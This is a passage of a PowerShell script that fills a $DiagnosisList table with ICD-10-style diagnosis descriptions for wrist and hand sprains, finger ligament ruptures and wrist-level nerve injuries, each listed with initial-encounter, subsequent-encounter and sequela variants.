and interphalangeal joint","Traumatic rupture of other ligament of other finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of unspecified finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of unspecified finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of unspecified finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of unspecified finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of unspecified finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of unspecified finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right wrist","Unspecified sprain of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right wrist","Unspecified sprain of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right wrist","Unspecified sprain of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left wrist","Unspecified sprain of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left wrist","Unspecified sprain of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left wrist","Unspecified sprain of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified wrist","Unspecified sprain of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified wrist","Unspecified sprain of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified wrist","Unspecified sprain of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of carpal joint of right wrist","Sprain of carpal joint of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of carpal joint of right wrist","Sprain of carpal joint of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of carpal joint of right wrist","Sprain of carpal joint of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of carpal joint of left wrist","Sprain of carpal joint of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of carpal joint of left wrist","Sprain of carpal joint of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of carpal joint of left wrist","Sprain of carpal joint of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of carpal joint of unspecified wrist","Sprain of carpal joint of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of carpal joint of unspecified wrist","Sprain of carpal joint of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of carpal joint of unspecified wrist","Sprain of carpal joint of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of radiocarpal joint of right wrist","Sprain of radiocarpal joint of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of radiocarpal joint of right wrist","Sprain of radiocarpal joint of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of radiocarpal joint of right wrist","Sprain of radiocarpal joint of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of radiocarpal joint of left wrist","Sprain of radiocarpal joint of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of radiocarpal joint of left wrist","Sprain of radiocarpal joint of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of radiocarpal joint of left wrist","Sprain of radiocarpal joint of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of radiocarpal joint of unspecified wrist","Sprain of radiocarpal joint of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of radiocarpal joint of unspecified wrist","Sprain of radiocarpal joint of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of radiocarpal joint of unspecified wrist","Sprain of radiocarpal joint of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Other specified sprain of right wrist","Other specified sprain of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified sprain of right wrist","Other specified sprain of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified sprain of right wrist","Other specified sprain of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Other specified sprain of left wrist","Other specified sprain of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified sprain of left wrist","Other specified sprain of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified sprain of left wrist","Other specified sprain of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Other specified sprain of unspecified wrist","Other specified sprain of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified sprain of unspecified wrist","Other specified sprain of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified sprain of unspecified wrist","Other specified sprain of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right thumb","Unspecified sprain of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right thumb","Unspecified sprain of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right thumb","Unspecified sprain of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left thumb","Unspecified sprain of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left thumb","Unspecified sprain of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left thumb","Unspecified sprain of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified thumb","Unspecified sprain of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified thumb","Unspecified sprain of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified thumb","Unspecified sprain of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right index finger","Unspecified sprain of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right index finger","Unspecified sprain of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right index finger","Unspecified sprain of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left index finger","Unspecified sprain of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left index finger","Unspecified sprain of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left index finger","Unspecified sprain of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right middle finger","Unspecified sprain of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right middle finger","Unspecified sprain of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right middle finger","Unspecified sprain of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left middle finger","Unspecified sprain of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left middle finger","Unspecified sprain of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left middle finger","Unspecified sprain of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right ring finger","Unspecified sprain of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right ring finger","Unspecified sprain of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right ring finger","Unspecified sprain of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left ring finger","Unspecified sprain of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left ring finger","Unspecified sprain of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left ring finger","Unspecified sprain of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right little finger","Unspecified sprain of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right little finger","Unspecified sprain of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right little finger","Unspecified sprain of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left little finger","Unspecified sprain of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left little finger","Unspecified sprain of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left little finger","Unspecified sprain of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of other finger","Unspecified sprain of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of other finger","Unspecified sprain of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of other finger","Unspecified sprain of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified finger","Unspecified sprain of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified finger","Unspecified sprain of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified finger","Unspecified sprain of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of right thumb","Sprain of interphalangeal joint of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of right thumb","Sprain of interphalangeal joint of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of right thumb","Sprain of interphalangeal joint of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of left thumb","Sprain of interphalangeal joint of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of left thumb","Sprain of interphalangeal joint of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of left thumb","Sprain of interphalangeal joint of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of unspecified thumb","Sprain of interphalangeal joint of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of unspecified thumb","Sprain of interphalangeal joint of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of unspecified thumb","Sprain of interphalangeal joint of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of right index finger","Sprain of interphalangeal joint of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of right index finger","Sprain of interphalangeal joint of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of right index finger","Sprain of interphalangeal joint of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of left index finger","Sprain of interphalangeal joint of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of left index finger","Sprain of interphalangeal joint of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of left index finger","Sprain of interphalangeal joint of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of right middle finger","Sprain of interphalangeal joint of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of right middle finger","Sprain of interphalangeal joint of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of right middle finger","Sprain of interphalangeal joint of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of left middle finger","Sprain of interphalangeal joint of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of left middle finger","Sprain of interphalangeal joint of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of left middle finger","Sprain of interphalangeal joint of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of right ring finger","Sprain of interphalangeal joint of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of right ring finger","Sprain of interphalangeal joint of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of right ring finger","Sprain of interphalangeal joint of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of left ring finger","Sprain of interphalangeal joint of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of left ring finger","Sprain of interphalangeal joint of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of left ring finger","Sprain of interphalangeal joint of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of right little finger","Sprain of interphalangeal joint of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of right little finger","Sprain of interphalangeal joint of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of right little finger","Sprain of interphalangeal joint of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of left little finger","Sprain of interphalangeal joint of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of left little finger","Sprain of interphalangeal joint of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of left little finger","Sprain of interphalangeal joint of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of other finger","Sprain of interphalangeal joint of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of other finger","Sprain of interphalangeal joint of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of other finger","Sprain of interphalangeal joint of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of unspecified finger","Sprain of interphalangeal joint of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of unspecified finger","Sprain of interphalangeal joint of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of unspecified finger","Sprain of interphalangeal joint of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of right thumb","Sprain of metacarpophalangeal joint of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of right thumb","Sprain of metacarpophalangeal joint of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of right thumb","Sprain of metacarpophalangeal joint of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of left thumb","Sprain of metacarpophalangeal joint of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of left thumb","Sprain of metacarpophalangeal joint of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of left thumb","Sprain of metacarpophalangeal joint of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of unspecified thumb","Sprain of metacarpophalangeal joint of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of unspecified thumb","Sprain of metacarpophalangeal joint of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of unspecified thumb","Sprain of metacarpophalangeal joint of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of right index finger","Sprain of metacarpophalangeal joint of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of right index finger","Sprain of metacarpophalangeal joint of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of right index finger","Sprain of metacarpophalangeal joint of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of left index finger","Sprain of metacarpophalangeal joint of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of left index finger","Sprain of metacarpophalangeal joint of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of left index finger","Sprain of metacarpophalangeal joint of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of right middle finger","Sprain of metacarpophalangeal joint of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of right middle finger","Sprain of metacarpophalangeal joint of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of right middle finger","Sprain of metacarpophalangeal joint of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of left middle finger","Sprain of metacarpophalangeal joint of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of left middle finger","Sprain of metacarpophalangeal joint of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of left middle finger","Sprain of metacarpophalangeal joint of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of right ring finger","Sprain of metacarpophalangeal joint of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of right ring finger","Sprain of metacarpophalangeal joint of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of right ring finger","Sprain of metacarpophalangeal joint of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of left ring finger","Sprain of metacarpophalangeal joint of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of left ring finger","Sprain of metacarpophalangeal joint of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of left ring finger","Sprain of metacarpophalangeal joint of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of right little finger","Sprain of metacarpophalangeal joint of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of right little finger","Sprain of metacarpophalangeal joint of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of right little finger","Sprain of metacarpophalangeal joint of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of left little finger","Sprain of metacarpophalangeal joint of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of left little finger","Sprain of metacarpophalangeal joint of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of left little finger","Sprain of metacarpophalangeal joint of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of other finger","Sprain of metacarpophalangeal joint of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of other finger","Sprain of metacarpophalangeal joint of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of other finger","Sprain of metacarpophalangeal joint of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of unspecified finger","Sprain of metacarpophalangeal joint of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of unspecified finger","Sprain of metacarpophalangeal joint of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metacarpophalangeal joint of unspecified finger","Sprain of metacarpophalangeal joint of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Other sprain of right thumb","Other sprain of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of right thumb","Other sprain of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of right thumb","Other sprain of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Other sprain of left thumb","Other sprain of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of left thumb","Other sprain of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of left thumb","Other sprain of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Other sprain of unspecified thumb","Other sprain of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of unspecified thumb","Other sprain of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of unspecified thumb","Other sprain of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Other sprain of right index finger","Other sprain of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of right index finger","Other sprain of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of right index finger","Other sprain of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Other sprain of left index finger","Other sprain of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of left index finger","Other sprain of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of left index finger","Other sprain of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Other sprain of right middle finger","Other sprain of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of right middle finger","Other sprain of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of right middle finger","Other sprain of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Other sprain of left middle finger","Other sprain of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of left middle finger","Other sprain of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of left middle finger","Other sprain of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Other sprain of right ring finger","Other sprain of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of right ring finger","Other sprain of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of right ring finger","Other sprain of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Other sprain of left ring finger","Other sprain of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of left ring finger","Other sprain of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of left ring finger","Other sprain of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Other sprain of right little finger","Other sprain of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of right little finger","Other sprain of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of right little finger","Other sprain of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Other sprain of left little finger","Other sprain of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of left little finger","Other sprain of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of left little finger","Other sprain of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Other sprain of other finger","Other sprain of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of other finger","Other sprain of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of other finger","Other sprain of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Other sprain of unspecified finger","Other sprain of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of unspecified finger","Other sprain of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of unspecified finger","Other sprain of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of other part of right wrist and hand","Sprain of other part of right wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other part of right wrist and hand","Sprain of other part of right wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other part of right wrist and hand","Sprain of other part of right wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of other part of left wrist and hand","Sprain of other part of left wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other part of left wrist and hand","Sprain of other part of left wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other part of left wrist and hand","Sprain of other part of left wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of other part of unspecified wrist and hand","Sprain of other part of unspecified wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other part of unspecified wrist and hand","Sprain of other part of unspecified wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other part of unspecified wrist and hand","Sprain of other part of unspecified wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified part of unspecified wrist and hand","Sprain of unspecified part of unspecified wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified part of unspecified wrist and hand","Sprain of unspecified part of unspecified wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified part of unspecified wrist and hand","Sprain of unspecified part of unspecified wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified part of right wrist and hand","Sprain of unspecified part of right wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified part of right wrist and hand","Sprain of unspecified part of right wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified part of right wrist and hand","Sprain of unspecified part of right wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified part of left wrist and hand","Sprain of unspecified part of left wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified part of left wrist and hand","Sprain of unspecified part of left wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified part of left wrist and hand","Sprain of unspecified part of left wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at wrist and hand level of unspecified arm","Injury of ulnar nerve at wrist and hand level of unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at wrist and hand level of unspecified arm","Injury of ulnar nerve at wrist and hand level of unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at wrist and hand level of unspecified arm","Injury of ulnar nerve at wrist and hand level of unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at wrist and hand level of right arm","Injury of ulnar nerve at wrist and hand level of right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at wrist and hand level of right arm","Injury of ulnar nerve at wrist and hand level of right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at wrist and hand level of right arm","Injury of ulnar nerve at wrist and hand level of right arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at wrist and hand level of left arm","Injury of ulnar nerve at wrist and hand level of left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at wrist and hand level of left arm","Injury of ulnar nerve at wrist and hand level of left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at wrist and hand level of left arm","Injury of ulnar nerve at wrist and hand level of left arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of median nerve at wrist and hand level of unspecified arm","Injury of median nerve at wrist and hand level of unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of median nerve at wrist and hand level of unspecified arm","Injury of median nerve at wrist and hand level of unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of median nerve at wrist and hand level of unspecified arm","Injury of median nerve at wrist and hand level of unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of median nerve at wrist and hand level of right arm","Injury of median nerve at wrist and hand level of right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of median nerve at wrist and hand level of right arm","Injury of median nerve at wrist and hand level of right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of median nerve at wrist and hand level of right arm","Injury of median nerve at wrist and hand level of right arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of median nerve at wrist and hand level of left arm","Injury of median nerve at wrist and hand level of left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of median nerve at wrist and hand level of left arm","Injury of median nerve at wrist and hand level of left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of median nerve at wrist and hand level of left arm","Injury of median nerve at wrist and hand level of left arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at wrist and hand level of unspecified arm","Injury of radial nerve at wrist and hand level of unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at wrist and hand level of unspecified arm","Injury of radial nerve at wrist and hand level of unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at wrist and hand level of unspecified arm","Injury of radial nerve at wrist and hand level of unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at wrist and hand level of right arm","Injury of radial nerve at wrist and hand level of right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at wrist and hand level of right arm","Injury of radial nerve at wrist and hand level of right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at wrist and hand level of right arm","Injury of radial nerve at wrist and hand level of right arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at wrist and hand level of left arm","Injury of radial nerve at wrist and hand level of left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at wrist and hand level of left arm","Injury of radial nerve at wrist and hand level of left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at wrist and hand level of left arm","Injury of radial nerve at wrist and hand level of left arm, sequela") + $null = 